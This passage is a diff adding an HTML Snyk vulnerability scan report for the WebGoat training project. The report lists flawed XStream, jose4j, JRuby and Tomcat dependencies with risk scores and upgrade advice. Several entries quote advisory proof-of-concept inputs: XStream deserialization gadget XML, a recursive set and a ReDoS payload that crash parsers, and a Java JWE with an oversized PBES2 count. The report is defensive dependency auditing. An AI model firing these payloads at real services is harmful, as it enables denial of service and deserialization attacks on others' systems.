+    &lt;sun.reflect.annotation.AnnotationInvocationHandler&gt;
+      &lt;default&gt;
+        &lt;memberValues class=&#39;javax.script.SimpleBindings&#39;&gt;
+          &lt;map class=&#39;javax.script.SimpleBindings&#39; reference=&#39;..&#39;/&gt;
+        &lt;/memberValues&gt;
+        &lt;type&gt;javax.xml.transform.Templates&lt;/type&gt;
+      &lt;/default&gt;
+    &lt;/sun.reflect.annotation.AnnotationInvocationHandler&gt;
+  &lt;/sun.reflect.annotation.AnnotationInvocationHandler&gt;
+&lt;/linked-hash-set&gt;
+</code></pre><pre><code>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.18 or higher.</p><h2>References</h2><ul><li><a href="https://x-stream.github.io/CVE-2021-39140.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li><li><a href="https://x-stream.github.io/changes.html#1.4.18" target="_blank" rel="noopener noreferrer">XStream Changelog</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569189" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">53</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3091180</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.20 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/x-stream/xstream/commit/fe215b33fbc68ab1a6aa526e00ca607926bb3737" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/x-stream/xstream/issues/314" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3091180" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">230</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3182897</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item" style="color:#AB1A1A;font-weight:600">Reachable</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream at unmarshalling time, and replace or inject objects. This can result in a stack overflow calculating a recursive hash set, causing a denial of service.</p><h2>Workaround</h2><p>This effects of this vulnerability can be avoided by catching the StackOverflowError in the calling application.</p><h2>PoC</h2><p>Create a simple HashSet and use XStream to marshal it to XML.  Replace the XML with following snippet and unmarshal it with XStream.</p><pre><code>&lt;div class=&#34;Source XML&#34;&gt;&lt;pre&gt;
+&lt;set&gt;
+  &lt;set&gt;
+    &lt;set&gt;
+      &lt;set&gt;
+        &lt;set&gt;
+          &lt;set&gt;
+            &lt;string&gt;a&lt;/string&gt;
+          &lt;/set&gt;
+          &lt;set&gt;
+            &lt;string&gt;b&lt;/string&gt;
+          &lt;/set&gt;
+        &lt;/set&gt;
+        &lt;set&gt;
+          &lt;string&gt;c&lt;/string&gt;
+          &lt;set reference=&#39;../../../set/set[2]&#39;/&gt;
+        &lt;/set&gt;
+      &lt;/set&gt;
+    &lt;/set&gt;
+  &lt;/set&gt;
+&lt;/set&gt;;
+&lt;/pre&gt;&lt;/div&gt;
+&lt;div class=&#34;Source Java&#34;&gt;&lt;pre&gt;XStream xstream = new XStream();
+xstream.fromXML(xml);
+&lt;/pre&gt;&lt;/div&gt;
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.20 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/x-stream/xstream/commit/e9151f221b4969fb15b1e946d5d61dcdd459a391" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="http://x-stream.github.io/CVE-2022-41966.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3182897" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">255</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Insecure XML deserialization</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-460764</li>
+      <li class="card-meta-item">CWE-94</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item" style="color:#AB1A1A;font-weight:600">Reachable</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Insecure XML deserialization. It could deserialize arbitrary user-supplied XML content, representing objects of any type. A remote attacker able to pass XML to XStream could use this flaw to perform a variety of attacks, including remote code execution in the context of the server running the XStream application.</p><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.7, 1.4.11 or higher.</p><h2>References</h2><ul><li><a href="http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html" target="_blank" rel="noopener noreferrer">Dinis Cruz Blog</a></li><li><a href="https://www.exploit-db.com/exploits/39193" target="_blank" rel="noopener noreferrer">Exploit DB</a></li><li><a href="https://fisheye.codehaus.org/changelog/xstream?cs=2210" target="_blank" rel="noopener noreferrer">Fisheye</a></li><li><a href="https://github.com/x-stream/xstream/commit/6344867dce6767af7d0fe34fb393271a6456672d" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://bugzilla.redhat.com/CVE-2013-7285" target="_blank" rel="noopener noreferrer">Redhat Bugzilla</a></li><li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=1051277" target="_blank" rel="noopener noreferrer">RedHat Bugzilla Bug</a></li><li><a href="https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2013/CVE-2013-7285.yaml" target="_blank" rel="noopener noreferrer">Nuclei Templates</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-460764" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+    </details>
+    <details class="finding-type-section">
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Ignored Security Issues (4)</h2></summary>
+      <div class="issue-card severity--high ignored">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">194</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Denial of Service (DoS)</h3>
+      <span class="ignored-badge">Ignored</span>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-ORGBITBUCKETBC-6139942</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> org.bitbucket.b_c:jose4j@0.9.3</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; org.bitbucket.b_c:jose4j@0.9.3</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://bitbucket.org/b_c/jose4j" target="_blank" rel="noopener noreferrer">org.bitbucket.b_c:jose4j</a> is a robust and easy to use open source implementation of JSON Web Token (JWT) and the JOSE specification suite (JWS, JWE, and JWK). It is written in Java and relies solely on the JCA APIs for cryptography. Please see https://bitbucket.org/b_c/jose4j/wiki/Home for more info, examples, etc...</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS) via a large <code>p2c</code> (PBES2 Count) value. An attacker can cause the application to consume excessive CPU resources by supplying an unusually high PBES2 Count value.</p><h2>PoC</h2><pre><code>
+import org.jose4j.jwa.AlgorithmConstraints;
+import org.jose4j.jwe.ContentEncryptionAlgorithmIdentifiers;
+import org.jose4j.jwe.JsonWebEncryption;
+import org.jose4j.jwe.KeyManagementAlgorithmIdentifiers;
+import org.jose4j.keys.AesKey;
+import org.jose4j.lang.ByteUtil;
+
+import java.security.Key;
+
+public class jwt {
+    public static void main(String[] argc)throws Exception{
+        Key key = new AesKey(ByteUtil.randomBytes(16));
+        JsonWebEncryption jwe = new JsonWebEncryption();
+        jwe.setAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,
+                KeyManagementAlgorithmIdentifiers.PBES2_HS256_A128KW));
+        jwe.setContentEncryptionAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,
+                ContentEncryptionAlgorithmIdentifiers.AES_128_CBC_HMAC_SHA_256));
+        jwe.setKey(key);
+        jwe.setCompactSerialization(&#34;eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJ1RWxQUGhJLThGY2h3a1BhIn0=.JOIw8ccIdkor7-ZaHQz6pUkqj2VEL_XIuonOwdSrdeXxFb7qN8FZKw.1-ZgAG8KzCbl6wDjUzrsTw.0pLJ0ZEu9OMYV1jyfPIrqg.gFNkCEwB1lf_Jovc7ZOd5w&#34;);
+        System.out.println(&#34;Payload: &#34; + jwe.getPayload());
+    }
+}
+
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>Remediation</h2><p>Upgrade <code>org.bitbucket.b_c:jose4j</code> to version 0.9.4 or higher.</p><h2>References</h2><ul><li><a href="https://bitbucket.org/b_c/jose4j/commits/1afaa1e174b3" target="_blank" rel="noopener noreferrer">Bitbucket Commit</a></li><li><a href="https://bitbucket.org/b_c/jose4j/issues/212" target="_blank" rel="noopener noreferrer">Bitbucket Issue</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-ORGBITBUCKETBC-6139942" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+  <div class="ignore-details">
+    <div class="ignore-detail"><span class="ignore-label">Expiration:</span> Does not expire</div>
+    <div class="ignore-detail"><span class="ignore-label">Category:</span> not-vulnerable</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored on:</span> November 19, 2025</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored by:</span> Catalin</div>
+    <div class="ignore-detail"><span class="ignore-label">Reason:</span> Is not used</div>
+  </div>
+</div>
+      <div class="issue-card severity--high ignored">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">84</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Memory Allocation with Excessive Size Value</h3>
+      <span class="ignored-badge">Ignored</span>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-ORGJRUBY-10557729</li>
+      <li class="card-meta-item">CWE-789</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> org.jruby:jruby-stdlib@10.0.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; org.asciidoctor:asciidoctorj@3.0.0 &#x203A; org.jruby:jruby@10.0.0.1 &#x203A; org.jruby:jruby-stdlib@10.0.0.1</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.jruby.org/" target="_blank" rel="noopener noreferrer">org.jruby:jruby-stdlib</a> is a JRuby Lib Setup package.</p><p>Affected versions of this package are vulnerable to Memory Allocation with Excessive Size Value in the <code>ResponseReader</code> class. An attacker can cause the application to allocate excessive memory and trigger a denial of service by including &#34;literal&#34; strings in responses sent to client-initiated connections and IMAP commands.</p><p>After implementing the fix, the default <code>max_response_size</code> is still high (512MiB) to accommodate backward compatibility. It is recommended to set a lower <code>max_response_size</code> if connecting to untrusted servers or using insecure connections.</p><h2>Remediation</h2><p>A fix was pushed into the <code>master</code> branch but not yet published.</p><h2>References</h2><ul><li><a href="https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/ruby/net-imap/pull/442" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://github.com/ruby/net-imap/pull/445" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://github.com/ruby/net-imap/pull/446" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://github.com/ruby/net-imap/pull/447" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2362749" target="_blank" rel="noopener noreferrer">Red Hat Bugzilla Bug</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-ORGJRUBY-10557729" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+  <div class="ignore-details">
+    <div class="ignore-detail"><span class="ignore-label">Expiration:</span> Does not expire</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored on:</span> November 11, 2025</div>
+    <div class="ignore-detail"><span class="ignore-label">Reason:</span> None Given</div>
+  </div>
+</div>
+      <div class="issue-card severity--medium ignored">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">141</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Deserialization of Untrusted Data</h3>
+      <span class="ignored-badge">Ignored</span>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088330</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. An attacker can manipulate the processed input stream and replace or inject objects, that result in executed evaluation of a malicious regular expression, causing a denial of service.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class=&#39;javafx.collections.ObservableList$1&#39;/&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+      &lt;dataHandler&gt;
+        &lt;dataSource class=&#39;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource&#39;&gt;
+          &lt;contentType&gt;text/plain&lt;/contentType&gt;
+          &lt;is class=&#39;java.io.SequenceInputStream&#39;&gt;
+            &lt;e class=&#39;javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator&#39;&gt;
+              &lt;iterator class=&#39;java.util.Scanner&#39;&gt;
+                &lt;buf class=&#39;java.nio.HeapCharBuffer&#39;&gt;
+                  &lt;mark&gt;-1&lt;/mark&gt;
+                  &lt;position&gt;0&lt;/position&gt;
+                  &lt;limit&gt;0&lt;/limit&gt;
+                  &lt;capacity&gt;1024&lt;/capacity&gt;
+                  &lt;address&gt;0&lt;/address&gt;
+                  &lt;hb&gt;&lt;/hb&gt;
+                  &lt;offset&gt;0&lt;/offset&gt;
+                  &lt;isReadOnly&gt;false&lt;/isReadOnly&gt;
+                &lt;/buf&gt;
+                &lt;position&gt;0&lt;/position&gt;
+                &lt;matcher&gt;
+                  &lt;parentPattern&gt;
+                    &lt;pattern&gt;\p{javaWhitespace}+&lt;/pattern&gt;
+                    &lt;flags&gt;0&lt;/flags&gt;
+                  &lt;/parentPattern&gt;
+                  &lt;from&gt;0&lt;/from&gt;
+                  &lt;to&gt;0&lt;/to&gt;
+                  &lt;lookbehindTo&gt;0&lt;/lookbehindTo&gt;
+                  &lt;text class=&#39;java.nio.HeapCharBuffer&#39; reference=&#39;../../buf&#39;/&gt;
+                  &lt;acceptMode&gt;0&lt;/acceptMode&gt;
+                  &lt;first&gt;-1&lt;/first&gt;
+                  &lt;last&gt;0&lt;/last&gt;
+                  &lt;oldLast&gt;-1&lt;/oldLast&gt;
+                  &lt;lastAppendPosition&gt;0&lt;/lastAppendPosition&gt;
+                  &lt;locals/&gt;
+                  &lt;hitEnd&gt;false&lt;/hitEnd&gt;
+                  &lt;requireEnd&gt;false&lt;/requireEnd&gt;
+                  &lt;transparentBounds&gt;true&lt;/transparentBounds&gt;
+                  &lt;anchoringBounds&gt;false&lt;/anchoringBounds&gt;
+                &lt;/matcher&gt;
+                &lt;delimPattern&gt;
+                  &lt;pattern&gt;(x+)*y&lt;/pattern&gt;
+                  &lt;flags&gt;0&lt;/flags&gt;
+                &lt;/delimPattern&gt;
+                &lt;hasNextPosition&gt;0&lt;/hasNextPosition&gt;
+                &lt;source class=&#39;java.io.StringReader&#39;&gt;
+                  &lt;lock class=&#39;java.io.StringReader&#39; reference=&#39;..&#39;/&gt;
+                  &lt;str&gt;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&lt;/str&gt;
+                  &lt;length&gt;32&lt;/length&gt;
+                  &lt;next&gt;0&lt;/next&gt;
+                  &lt;mark&gt;0&lt;/mark&gt;
+                &lt;/source&gt;
+              &lt;/iterator&gt;
+              &lt;type&gt;KEYS&lt;/type&gt;
+            &lt;/e&gt;
+            &lt;in class=&#39;java.io.ByteArrayInputStream&#39;&gt;
+              &lt;buf&gt;&lt;/buf&gt;
+              &lt;pos&gt;0&lt;/pos&gt;
+              &lt;mark&gt;0&lt;/mark&gt;
+              &lt;count&gt;0&lt;/count&gt;
+            &lt;/in&gt;
+          &lt;/is&gt;
+          &lt;consumed&gt;false&lt;/consumed&gt;
+        &lt;/dataSource&gt;
+        &lt;transferFlavors/&gt;
+      &lt;/dataHandler&gt;
+      &lt;dataLen&gt;0&lt;/dataLen&gt;
+    &lt;/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference=&#39;../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&#39;/&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</code></pre><p>Users who follow <a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">the recommendation</a> to setup XStream&#39;s security framework with a whitelist limited to the minimal required types are not affected.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.</p><p>Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found i</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088330" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+  <div class="ignore-details">
+    <div class="ignore-detail"><span class="ignore-label">Expiration:</span> November 10, 2026</div>
+    <div class="ignore-detail"><span class="ignore-label">Category:</span> wont-fix</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored on:</span> November 19, 2025</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored by:</span> Catalin</div>
+    <div class="ignore-detail"><span class="ignore-label">Reason:</span> Does not apply</div>
+  </div>
+</div>
+      <div class="issue-card severity--medium ignored">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">87</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Improper Resource Shutdown or Release</h3>
+      <span class="ignored-badge">Ignored</span>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-ORGAPACHETOMCATEMBED-13723930</li>
+      <li class="card-meta-item">CWE-404</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> org.apache.tomcat.embed:tomcat-embed-core@10.1.46</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; org.springframework.boot:spring-boot-starter-web@3.5.6 &#x203A; org.springframework.boot:spring-boot-starter-tomcat@3.5.6 &#x203A; org.apache.tomcat.embed:tomcat-embed-core@10.1.46</div>
+    </div>
+    <div class="issue-summary severity--medium">
